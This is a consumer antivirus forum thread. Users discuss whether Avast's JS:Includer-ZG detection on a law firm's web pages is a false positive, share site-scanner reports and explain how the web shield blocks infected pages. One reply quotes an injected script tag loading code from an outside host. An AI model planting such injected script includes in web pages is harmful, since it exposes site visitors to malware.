Avast WEBforum
Consumer Products => Avast Free Antivirus / Premium Security (legacy Pro Antivirus, Internet Security, Premier) => Topic started by: REDACTED on October 25, 2014, 04:51:58 PM
-
http://www.pljlawsite.com/html/CrpcXXX.htm
Please replace the XXX above with any number between 160 and 170.
All are infected with JS:Includer-ZG [Trj]. May it be false positive?
-
-> http://sitecheck.sucuri.net/results/www.pljlawsite.com/html/crpc160.htm
-
VirusTotal - html scan
https://www.virustotal.com/nb/file/1cad19bfc19793f3f4c3638bfe072a388574a1b75a3c4d6e65a6bb3e96136594/analysis/
-
Suspicious here http://aw-snap.info/file-viewer/?tgt=http%3A%2F%2Fwww.pljlawsite.com%2Fhtml%2Fcrpc160.htm&ref_sel=Google&ua_sel=ff&fs=1
http://zulu.zscaler.com/submission/show/a6d0f6723239796bc47e479b9fba4f9e-1414249907
No, that is not a safe site.
-
I have already disabled 'Block malware URLs', why is the site in question still being blocked?
-
Because the site is infected.
-
According to the pop-up message, nothing was downloaded from the site. How did avast know that the site was infected?
-
According to the pop-up message, nothing was downloaded from the site. How did avast know that the site was infected?
Because webshield is scanning the site
and confirmed here
Sucuri report http://sitecheck.sucuri.net/results/www.pljlawsite.com/html/crpc160.htm
VirusTotal - html scan
https://www.virustotal.com/nb/file/1cad19bfc19793f3f4c3638bfe072a388574a1b75a3c4d6e65a6bb3e96136594/analysis/
-
Because webshield is scanning the site
Do you mean the webpage was scanned when my browser was downloading it?
-
before and blocked.....
-
Sorry, I don't understand.
Before downloading, the webpage was not yet on my computer, how could avast scan it?
-
http://www.avast.com/faq.php?article=AVKB32#artTitle
-
The site also has other problems: https://asafaweb.com/Scan?Url=www.pljlawsite.com%2Fhtml%2Fcrpc160.htm
error and warnings.
Code hick-up: wXw.pljlawsite.com/js/jquery-ui-1.8.14.custom.min.js benign
[nothing detected] (script) wXw.pljlawsite.com/js/jquery-ui-1.8.14.custom.min.js
status: (referer=www.pljlawsite.com/)saved 31909 bytes 9d62bdd941e9c624fdc05d31c88ccc842383d9e3
info: [decodingLevel=0] found JavaScript
error: undefined variable jQuery
error: undefined variable c.ui
error: line:1: SyntaxError: missing ; before statement:
error: line:1: var c.ui = 1; (remote exploit on bash)
error: line:1: ....^
suspicious
@Matthew_Wai,
Whenever avast detects malicious code inside the website it immediately blocks it, so it can never land and open up in your browser and contact your computer, therefore your computer cannot get infested, because it is not allowed to connect to that site.
When avast detects<script src=htxp://fr-cafe.org/vb/chat.php ></script><body lang=EN-US style='tab-interval:.5in'> it alerts, disconnects and you are secure.
To cleanse any remainders of Web Shield contacts and alerts I recommend a full scan of your users file on the computer. This takes a while but should be performed once in a fortnight, at least that is my personal routine.
polonus
-
so it can never land and open up in your browser and contact your computer,
Do you mean it cannot land my harddisk?